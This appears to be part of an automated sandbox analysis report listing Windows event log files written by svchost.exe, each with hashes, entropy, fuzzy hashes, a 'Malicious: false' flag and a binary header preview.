SHA-512:	63080D340B33DF8418977430F4E2F1DF647F10A50D4564F7466CD24C2355C363DF8D6540DBAAC0E42273868924EE411EC51068A6F7639B4483C09A640593006A
Malicious:	false
Preview:	ElfChnk.........n...............n........... .......:=.Y....................................................................O...................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F........................................8.......................<...........@..m>.......:..%D..........u+.......&..........m$..........=...]2......**...............i..z.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.242406347919902
Encrypted:	false
SSDEEP:	384:5hYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Kl7:51T4hIQ0
MD5:	24A05FB4CA6A530DC4D40404368A043A
SHA1:	6679C234B0E3080E39D1367D95BB6F539259A052
SHA-256:	A305C8003D5A4C4B3AE309ECA013E5592FF352D22842FECA37E70AFD0AAA4043
SHA-512:	EB4BDECFFD43F5830E883A49AFCC90AB5EC2E81159CEDA7C41AE421F8E7E4EEC1FC7EBDE6B884F175BF709B2E281AB272C4E1F6A51A4CB08CE6341F2B6BFE42A
Malicious:	false
Preview:	ElfChnk.........i...............i........... ................................................................................x@................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.351739790289868
Encrypted:	false
SSDEEP:	384:NahFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDx:MzSKEqsMuy6f
MD5:	8EE5F0242DD4C47EFF5682FCF04DFA22
SHA1:	2533997723757D8F3C8D7838C8B3576FA9DBB925
SHA-256:	1926D474DBD075F9D12EECF13B90A95F5CA0F230810DD2B41A68236556A8F256
SHA-512:	ECAC7764E2441600BC58CF3C5DFA7D7BBF726885544DD7CF281C835D08E1E580FE12F2CD96A569C55E9E1C6ACFE7266739503E07CF51CB2FDD85DD851C6CADAB
Malicious:	false
Preview:	ElfChnk.........H...............H...........Xy...z..........................................................................C...................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=........`......................................................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.0681491427983456
Encrypted:	false
SSDEEP:	384:UYhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3G:9mw9g3Lcf
MD5:	25CCA867EAB2774426FED5C3D04A2EF4
SHA1:	6067781D454A6EDF9E98A78132B69F436AC16337
SHA-256:	44D697FC3B28B68CE43669A173E29F2ADC987FD88481E65A924C8E194CD853F0
SHA-512:	3CE99ECDE9CF15113BD27441F6FC6CA41C428AE3BF327E500B99A5F2EDEA73DF85284BE9535B0CB9936B4BF35D48B82822B102DB4871F2C2E3A97E6E1EC95D19
Malicious:	false
Preview:	ElfChnk.........3...............3............i..Xk..a.........................................................................Y.................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#........X......................................................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.8987523722619128
Encrypted:	false
SSDEEP:	384:QohCI2q16fIwIaIgucw7VIh3IAIHyIAIJIEIzITI5IYIMI+2Ia:QoWt67QzY
MD5:	A8DF72B289CBC51F9CD71706EB9C8074
SHA1:	9EBE0554C13EDF570F7A8CAD77E0D54B6064B024
SHA-256:	928FEF11A8961DB802D45388B8191C37BB6A3324C6B4CB6143E86DFAE8CAB9FB
SHA-512:	21000A9F3E92D89092650B9228BF60989ED5AF52F2F8EAC06E04EF1BA6F86B530E2DCF3091EC7A58A5FC523D7948930347F5E5C52D885103AC5256511D5EA2EC
Malicious:	false
Preview:	ElfChnk.8.......H.......8.......H...............H...?p......................................................................>...................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................................................5)......................................................................................**......8........lO>y.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.029512281542089
Encrypted:	false
SSDEEP:	384:Sh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhM5vMMKMVaMpb9:SeJ+
MD5:	C27B7F0F7B0FB25DF8611EA44A294878
SHA1:	A39349908835FA25EFA5A44B4F37331BAE1FBFD8
SHA-256:	C5FE3C69BD247DF517F7FF1E6E07C6ACC411DF9DBA60E4EC6BC32A841D990490
SHA-512:	8FD8E689C630B7E62BF2953E4C6BE30EF3366A0D2B627DFC167079EE01321E051816DD3EC335D231633CD12912CD39CCE7572CA4F69D2EEC9C1D7D9D38210BDD
Malicious:	false
Preview:	ElfChnk.....................................0-......e..;................................................................................................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................6(......................................................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.0958062741245485
Encrypted:	false
SSDEEP:	384:phk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1Q:pBjdjP0csYEt
MD5:	E5FFA1C93474375EE0EDC9B1D47B08EB
SHA1:	40CC41E6F362B52D1B30376DEF2074003E16CB28
SHA-256:	4B4202968F37AE509E34046ECDCC19C0FDC5CFD61D501031EC0A7EF4A82E6303
SHA-512:	D49594FD894C2A727DFB0650D87A6A725D635FE52CC7A035BB48277052AF87548CCF56D42A2EB94ACDD1F5754294586D19A62047ACB73EDB0779DACC859BCEFE
Malicious:	false
Preview:	ElfChnk.....................................`.........A.....................................................................x=V3................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................*..............5.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	77968
Entropy (8bit):	3.1764015420210345
Encrypted:	false
SSDEEP:	384:PZIdJVI2IFIHIUIxIaIQIBLI33IzBIbnIFIvIoIuWI3IbQ9IOdHIAIhInWhDIEQP:POvQLdlWZxGD7DUvQLd
MD5:	5CA1DBD18BC9F93C4FD7A1E740277258
SHA1:	20B0AA4C2666F5EB47CF6A5E6F2F85DD73A2D1E1
SHA-256:	C5597D09DBF9EC89C1D01DE4417553565F31354166590069F26110EA0CC4702E
SHA-512:	DFB178DFD8CCCAB2B2FAFD1254531A4E5EA4E9F3735A1E2CC4FA8472B4A0DB95ACD6342FC840F1A2717256B6AD74B22944DD4DDD13108B831F1A6B94F41E42C7
Malicious:	false
Preview:	ElfChnk.T...............T...........................12........................................................................\.........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................................................ax...............J..1........................................)..........................**......r.........b.............>..J..............................................................,.......D.....!........... ....@..b......#..\|....#..\|...........r....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s..z.?..nM.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s./.O.p.e.r.a.t.i.o.n.a.l.......ax..&.......6p.\.#i....>..........2........A..=...>.../....=.......V.o.l.u.m.e.C.o.r.r.e.l.a.t.i.o.n.I.d.......A..7...>...)....=.......V.o.l.u.m.e.N.a.m.e.L.e.n.g.t.h....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7757677601444701
Encrypted:	false
SSDEEP:	384:Ih6iIvcImIvITIQIoIoI3IEIMIoIBIbIsDIMI/IElI:IoxfM
MD5:	1C5307106CE519AB4E031F987728545E
SHA1:	05AF7E5DCB8CB653A42401ACA9FDD4E65DF313D7
SHA-256:	6068A83FE75666D6384EF3FE52E750C0C50715BD1CA6C79F4E815E928EAF7749
SHA-512:	9B0132164BCE3385C4450745AB21106494668A8196EDA0C7074C98743DF4262800CE75BD84093122314A9D9F15BF69412086B4D43723F7244FBFEA1D42E06158
Malicious:	false
Preview:	ElfChnk......................................!..X"....Y>......................................................................O............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................^.......................................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.8926911957757824
Encrypted:	false
SSDEEP:	768:E4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH13r:+
MD5:	41C05605A1D8406986AB7E1A38EF5F6A
SHA1:	FBABF27EC5005702DB27138A6FFEE44C08C0AF9F
SHA-256:	A24B9104262DB2C2DB4CACD2B80878E7F33F344FB3CA4817552F2430FAE02FCB
SHA-512:	4CB12276520B25399F9259495DDC3D48B43FB38FC12E5924F0A2ACDDDAD0CC808E96000BE3CE8D783307CEC152D3C881FF623FC6B60E78AB1D3DFBC9D0A7D521
Malicious:	false
Preview:	ElfChnk.........................................(......N....................................................................0w_.................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	7128
Entropy (8bit):	4.154098052297632
Encrypted:	false
SSDEEP:	192:HYt+38V77/yAjpcyZpXyLp0yCpYryUpHyFRpCQydpYSyTpoyKt8pUyq5TpYTyl6e:o7hzy3yzy2yFyAyF2QypymyufytyldyS
MD5:	77CDC8D79A9054B804347E7B7B9C22F5
SHA1:	C97A837005A8F9EE800B672EC2C5F8FB4EB1B56B
SHA-256:	2666F6BD45FD873B32D44575C76277A3D52C914ABD5B699903DF269E4B524573
SHA-512:	0D56801A2D89B57BDFA4F151574BF14B575F042E1CE98A4E5600549C5202223B10D051BF31F0F38EA2C0AE2A1B06AE4C04C5BE112785F9E5D35A6E8DBE31C619
Malicious:	false
Preview:	ElfChnk.................O.......W...............@....c......................................................................._..................0...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................&.......................................................................**..`...O.......:..............>.&.........>.]v0].............A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.431161619621183
Encrypted:	false
SSDEEP:	768:TaTzn2C8PNMKfN1JlYnY91yHqvTLGx/p9e:KznUNMKF1JlYn2EKvT+pc
MD5:	AD71949D7766CE333A6B47030D3636B3
SHA1:	8BF1B493CEF6898A9DF12197BF36892C9FF37013
SHA-256:	188CC4E3CE00C52F6F33CC911DC881F612F1257C28A7BCA6B19CBE1051C59ABC
SHA-512:	E74449F0A683FDC216958A05DFF0D664E6504C786611254CAF59E4D4C779AA8F5ADFF939A4544BD0777D91D929C3AD6AF13EF2D2B750969475C2BA461366F361
Malicious:	false
Preview:	ElfChnk.........J...............J...........`.......s)Z.....................................................................,..%................n...........................=...........................................................................................................................f...............?...........................m...................M...F................................................................y..........&...............G....................................&..................**...............B..\|...........>.&.........>.]v0].............A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7292526058307754
Encrypted:	false
SSDEEP:	384:ehP8o8Z85848V8M8g8D8R8E8z8gh8r8U8:el
MD5:	66DDAF28DEF9C7EF4C1C5AF13E903BEF
SHA1:	16ADC17E9E501EC1FC66C217B0A95938B5B26D99
SHA-256:	FF21B59E89C1D2ABD6D42A42337FF6EA79D48B4BAF1EB8E74F337C62F3F2B59D
SHA-512:	350985C41F91B7B31649829636C3FB98F563132353B8E8812807C810AC9F3EA3787C9ECE5103217769B32CA0E0BD71FE724D16DE3DE9FEA80105E47A6E5D1956
Malicious:	false
Preview:	ElfChnk.....................................@.......J.{.....................................................................aG.........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............v.......................................................................**..(.............................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.759510303432342
Encrypted:	false
SSDEEP:	1536:nXhxUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:nXznS
MD5:	3611D65103293C998063DA829CC23366
SHA1:	59E4A7222413F5B753D6382609623D0AD479C0BC
SHA-256:	E582C2B47E58387FD15A0E8B596FCB115B6FA80ED4F76D1AF969DC634CAE4526
SHA-512:	0EA7376DA8612958BE75C148C163513D6DCC689BB4E11C864D8BD71E307C3B2F4B5CA957BE4E895E6FD8A80FE16E63FB6DFE803303BBA89C7ECC26E90819B1BD
Malicious:	false
Preview:	ElfChnk.........&...............&...........`G...I..........................................................................On..................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................=..............................................O.......................**..............g5...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.326600334124648
Encrypted:	false
SSDEEP:	768:/0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9OSaEbQvUcP9cM1cW:dcEm
MD5:	23E0BBADE75A049E789D9EF4428B6D16
SHA1:	2BBDA8A9ACEAC9604CD192CB83F0DFD0C274B828
SHA-256:	8F66DD1ABAEDEE283B60251E5E5CE69AFD7FC632CB3DA202AED0C4A7AE8D5738
SHA-512:	C2F47557EB37E90B2A93EA6C8F8889DE92B8C3D14BA7BB9FB103B3DC3B5A32134E567E6103349F48B246D776F58F89D983CDA80CE169D25E93C1B0DA2E8552F6
Malicious:	false
Preview:	ElfChnk.........;...............;............r...u....&......................................................................I..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F......................................&...........................................................%_...........b..............]...................*.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	83384
Entropy (8bit):	2.0343170148683227
Encrypted:	false
SSDEEP:	384:9hdi60lLNj5VUFQpN5N3iP5yY09GiP5pPdOiP5pq0iP5p0sViP5yYRiP5pTiP5pf:9KvfKvB2
MD5:	C3278A7D4C2CBAC2428F99BBD6630023
SHA1:	BFAA5411B811FF570E344AAE9082CEAE78D4D62E
SHA-256:	393D5EAF6920343DE1CCEDCD297824C94F87E3D6C915A99B8ABEE24BDE6C92BA
SHA-512:	A7D9FD16052805CE22C4A0D6745B24A5D6BD7A9966D6EBDE875F89F9D2EE8821E16644DF90E94B7DF3735414108E7665B313502D112817FF018A5771845FAF5E
Malicious:	false
Preview:	ElfChnk.'...............'....................9..@@....k.........................................................................................d...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............>.......................................................................**......'.........q.z.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.330812980192055
Encrypted:	false
SSDEEP:	384:Nlm/hDGCyCkCzCRCFCjOCjCmCLsCFCuCsC1CvCH2ga2g2E82A202sh2nCgCDCoPx:Nlm/dV95W+rdl00xY
MD5:	F5E348F85D07D86C32479D397F8EF4A9
SHA1:	14FCCD4003A8C9B0D78D0F18B6289B96365F8FBD
SHA-256:	376F962B9DDEA52BCD2996D7CB198EBCBB50232E318450ABD3A284650BE1DBF9
SHA-512:	A4B0AC9BB2335DA327DFDFCC64D61C2DEE02EE42622610B592DC28B1DB5F4E950D956040F0E4792028FB22F3FAE1DA1DF551FBFDCBB3F66F491295C343778DF1
Malicious:	false
Preview:	ElfChnk.U...............U...........................L....................................................................J...................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F............................4..............................&................d..............................Yd...............^......................**..0...U.........Df..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.487219530769755
Encrypted:	false
SSDEEP:	1536:yv3NvmwAwEGhqx00NfSVKoMzbJQBG6Jw+up2cXRITYH5lhTTh1m67KzbHCFiaBhX:yv3NvmwAwEGhqx00NfSVKoMzlQBG6Jw1
MD5:	D59E48DA62C61308E6541D9E92AC1F1C
SHA1:	C161B63BC2C2A32CE1935335BF55DDA270932255
SHA-256:	31B592408094085892003D4969F1BF5CE72E4D758C30489B9864674BDB81EA6E
SHA-512:	3B4D1648DE93007F4322660A4BC0DF7F2D73C3B3E6F24F126D89D1FF925D3CCDC19A92B988FB9AF6436DE5A267E3DF0D78CBBAF31A4A8A300393A823A8CE1BA4
Malicious:	false
Preview:	ElfChnk.....................................H[...]....+n....................................................................!0.Z................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................K......................................................................**..............9...z.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	69680
Entropy (8bit):	4.465997684688716
Encrypted:	false
SSDEEP:	1536:fI4hNZB+vczCQ0+K5yJe54qdmSRu7Srxwyqy7O0n5yTOoIYhXxbwLJ/qHTeZBS/I:fI4h7B+vczCQ0+K5yJe54qdmSM7Srxwi
MD5:	C654F241F738B4E935040CD9FB2D1C85
SHA1:	F40516930F94550D4036EB5EF7C91AC797E3696D
SHA-256:	94399231A0F079CE5BFFE14C5FE4BA98147C1DCDDBC66B5F0E34D445C8949D6D
SHA-512:	CC73B75CFDAA3D9AA9152A035C2CBCC34197F67F102001E1D16E2BB7C998C8DC0793CC22DAEB0358DB95383C2773A0FDECB8E6E89F29A95058A80C3BBABE194E
Malicious:	false
Preview:	ElfChnk.....................................@...............................................................................\|..A................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................&...................i~......Ah...............f...a..............Ij........x............L.............>.&...............................................................8.......P.....!....nqm......... .L.....Q:w....J.qt..5?] ...d............................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e..n30'.\|D..Q.R.a.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......L.a........t.-.Wx.....(.............N.............>.&...............................................................8.......P.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.2666167169548475
Encrypted:	false
SSDEEP:	384:yIh47R7u7aI7G7z7I7Q7q7V7l7x7W777a7T7C7E7A767m7c7D7Z707t7Pw7S7r7J:BU3dzV
MD5:	22D6CAF89D6E971BD7540D97009B5389
SHA1:	334700482A6DA16F1773192114015CE9E51098B9
SHA-256:	BA6278F8B009C2A4DA2B614AE03224F0E7AE9FA015B00627A86295558DDCFA2B
SHA-512:	B7337B44CFE646712683E576D1762DECD24658B946BE9724D715863A06AF84AA32201F16AA9B58653F22FBFE70FCDB45D9E06102C47530B4B04E4050B1175597
Malicious:	false
